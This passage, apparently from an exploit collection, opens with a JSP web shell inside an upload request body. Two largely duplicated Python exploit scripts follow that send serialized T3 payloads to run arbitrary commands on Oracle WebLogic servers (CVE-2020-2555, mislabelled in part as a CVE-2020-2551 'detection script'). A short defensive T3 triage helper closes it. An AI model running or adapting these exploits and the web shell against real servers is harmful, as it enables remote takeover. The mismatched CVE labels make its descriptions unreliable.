<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

------WebKitFormBoundary7MA4YWxkTrZu0gW--

WebLogic IIOP deserialization vulnerability detection script (CVE-2020-2551)

version

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0

Detection

#!/usr/bin/python
# -*- coding: utf-8 -*-
# from:https://github.com/zhzyker/exphub

import socket
import time
import ssl
import binascii
import urlparse
import argparse
import sys


globalProxies = {}
header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
    }

def parseUrl(url):
    parsed = urlparse.urlparse(url)
    proto = parsed.scheme
    netloc = parsed.netloc
    ip = netloc
    if proto == 'http':
        port = 80
    else:
        port = 443

    if (':' in netloc):
        ip = netloc.split(':')[0]
        port = netloc.split(':')[1]

    uri = parsed.path
    return (proto, ip, port, uri)


def CVE_2020_2555(cmd):
    payload_start = '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'
    payload_lenhex = '{:04x}'.format(len(cmd))
    payload_cmdhex = binascii.b2a_hex(cmd)
    payload_end = '7400046578656370767200116a6176612e6c616e672e52756e74696d650000000000000000000000787070'
    payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
    return payload

class payloadtest(object):
    def __init__(self):

        self.vuln = 'cve_2020_2555'

    def t3handshake(self,sock,server_addr):
        sock.connect(server_addr)
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
        time.sleep(1)
        data = sock.recv(1024)
        #print data
        #print 'handshake successful'

    def buildT3RequestObject(self,sock,port):
        data1 = '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'
        data2 = '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'
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(d.decode('hex'))
        time.sleep(2)
        #print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))

    def sendEvilObjData(self,sock,data):
        payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
        sock.send(payload.decode('hex'))
        time.sleep(2)
        sock.send(payload.decode('hex'))
        res = ''
        n=1
        try:
            while True:
                n += 1
                res += sock.recv(4096)
                time.sleep(0.1)
                if(n>15):
                    break
        except Exception as e:
            pass
        return res

    def check(self, url, cmd,timeout, proxies=globalProxies, **args):
        (proto, ip, port, uri) = parseUrl(url)

        server_addr = (ip, int(port))
        if proto == 'https':
            sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            self.t3handshake(sock,server_addr)
            self.buildT3RequestObject(sock,port)
            payload = CVE_2020_2555(cmd)
            resp = self.sendEvilObjData(sock,payload)

            print ('[+] Payload send succeed! Please check.')

            return True
        except Exception as e:
            print ('[-] Failed! Exception:{}'.format(str(e)))

        return False

def poc(url,cmd):
    x = payloadtest()
    return x.check(url, cmd,20)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-2555 Exp',
                                     usage='[*] use "python %(prog)s --help" for more information',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-u", "--url",
                        dest="url",
                        help="the url to check"
                        )

    parser.add_argument("-c", "--cmd",
                        dest="cmd",
                        help="the cmd to run on the target"
                        )
    args = parser.parse_args()
    if not args.url or not args.cmd:
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-2883_cmd.py -u http://127.0.0.1:7001 -c calc')
    poc(args.url, args.cmd)

Oracle Coherence deserialization vulnerability (CVE-2020-2555)

version

Oracle weblogic 12.1.3.0.0
Oracle weblogic 12.2.1.1.0
Oracle weblogic 12.2.1.2.0
Oracle weblogic 12.2.1.3.0
Oracle weblogic 12.2.1.4.0

Exploitation

#!/usr/bin/python
# -*- coding: utf-8 -*-
# from:https://github.com/zhzyker/exphub

import socket
import time
import ssl
import binascii
import urlparse
import argparse
import sys


globalProxies = {}
header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
    }

def parseUrl(url):
    parsed = urlparse.urlparse(url)
    proto = parsed.scheme
    netloc = parsed.netloc
    ip = netloc
    if proto == 'http':
        port = 80
    else:
        port = 443

    if (':' in netloc):
        ip = netloc.split(':')[0]
        port = netloc.split(':')[1]

    uri = parsed.path
    return (proto, ip, port, uri)


def CVE_2020_2555(cmd):
    payload_start = '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'
    payload_lenhex = '{:04x}'.format(len(cmd))
    payload_cmdhex = binascii.b2a_hex(cmd)
    payload_end = '7400046578656370767200116a6176612e6c616e672e52756e74696d650000000000000000000000787070'
    payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
    return payload

class payloadtest(object):
    def __init__(self):

        self.vuln = 'cve_2020_2555'

    def t3handshake(self,sock,server_addr):
        sock.connect(server_addr)
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
        time.sleep(1)
        data = sock.recv(1024)
        #print data
        #print 'handshake successful'

    def buildT3RequestObject(self,sock,port):
        data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e566
57273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
        data2 = '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'
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(d.decode('hex'))
        time.sleep(2)
        #print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))

    def sendEvilObjData(self,sock,data):
        payload='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'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
        sock.send(payload.decode('hex'))
        time.sleep(2)
        sock.send(payload.decode('hex'))
        res = ''
        n=1
        try:
            while True:
                n += 1
                res += sock.recv(4096)
                time.sleep(0.1)
                if(n>15):
                    break
        except Exception as e:
            pass
        return res

    def check(self, url, cmd,timeout, proxies=globalProxies, **args):
        (proto, ip, port, uri) = parseUrl(url)

        server_addr = (ip, int(port))
        if proto == 'https':
            sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            self.t3handshake(sock,server_addr)
            self.buildT3RequestObject(sock,port)
            payload = CVE_2020_2555(cmd)
            resp = self.sendEvilObjData(sock,payload)

            print ('[+] Payload send succeed! Please check.')

            return True
        except Exception as e:
            print ('[-] Failed! Exception:{}'.format(str(e)))

        return False

def poc(url,cmd):
    x = payloadtest()
    return x.check(url, cmd,20)


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-2555 Exp',
                                     usage='[*] use "python %(prog)s --help" for more information',
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument("-u", "--url",
                        dest="url",
                        help="the url to check"
                        )

    parser.add_argument("-c", "--cmd",
                        dest="cmd",
                        help="the cmd to run on the target"
                        )
    args = parser.parse_args()
    if not args.url or not args.cmd:
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-2883_cmd.py -u http://127.0.0.1:7001 -c calc')
    poc(args.url, args.cmd)
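Both scripts above open with the same T3 handshake in t3handshake(); as an added example (not code from the post or from exphub), the Python 3 helper below decodes that client hello and parses the server greeting, which is the check a defender runs to confirm that a connection filter really denies T3 on the listener before worrying about CVE-2020-2551/2555. The HELO greeting layout, the PN field and the sample replies are assumptions built from my own reading of the protocol rather than captures, and the affected-version set is the union of the two version lists on this page.

```python
# Added example (not from the post or exphub): decode the T3 client hello the
# scripts send in t3handshake() and triage the server's greeting. Python 3.
import binascii

# Hex taken verbatim from t3handshake() above.
T3_HELLO_HEX = "74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a"

# Union of the affected-version lists on this page. Only the base version is
# visible in the greeting, so a match means "verify the CPU patch level".
AFFECTED_BASE_VERSIONS = {"10.3.6.0.0", "12.1.3.0.0", "12.2.1.1.0",
                          "12.2.1.2.0", "12.2.1.3.0", "12.2.1.4.0"}


def decode_t3_hello(hex_str):
    """Return the T3 client hello as its protocol, version and header fields."""
    text = binascii.unhexlify(hex_str).decode("ascii")
    first, *rest = text.strip().split("\n")
    proto, version = first.split(" ", 1)            # "t3 12.2.1"
    fields = dict(line.split(":", 1) for line in rest if ":" in line)
    return {"protocol": proto, "version": version, "fields": fields}


def parse_t3_reply(reply):
    """Parse a T3 server greeting; None means the port did not answer as T3.
    Assumed format: 'HELO:<version>.<secure>' then AS/HL/MS header lines."""
    text = reply.decode("ascii", errors="replace")
    if not text.startswith("HELO:"):
        return None
    lines = text.strip().split("\n")
    version, _, secure = lines[0][len("HELO:"):].rpartition(".")
    fields = dict(line.split(":", 1) for line in lines[1:] if ":" in line)
    return {"version": version, "secure": secure == "true", "fields": fields}


def triage(reply):
    """Classify a reply as 't3-filtered', 'affected-version' or 't3-open'."""
    info = parse_t3_reply(reply)
    if info is None:
        return "t3-filtered"
    return "affected-version" if info["version"] in AFFECTED_BASE_VERSIONS else "t3-open"


# Constructed sample replies, not captured from a real server.
SAMPLE_AFFECTED = b"HELO:12.2.1.3.0.false\nAS:2048\nHL:19\nMS:10000000\nPN:DOMAIN\n\n"
SAMPLE_FILTERED = b"HTTP/1.1 400 Bad Request\r\n\r\n"

if __name__ == "__main__":
    print(decode_t3_hello(T3_HELLO_HEX))
    print(triage(SAMPLE_AFFECTED), triage(SAMPLE_FILTERED))
```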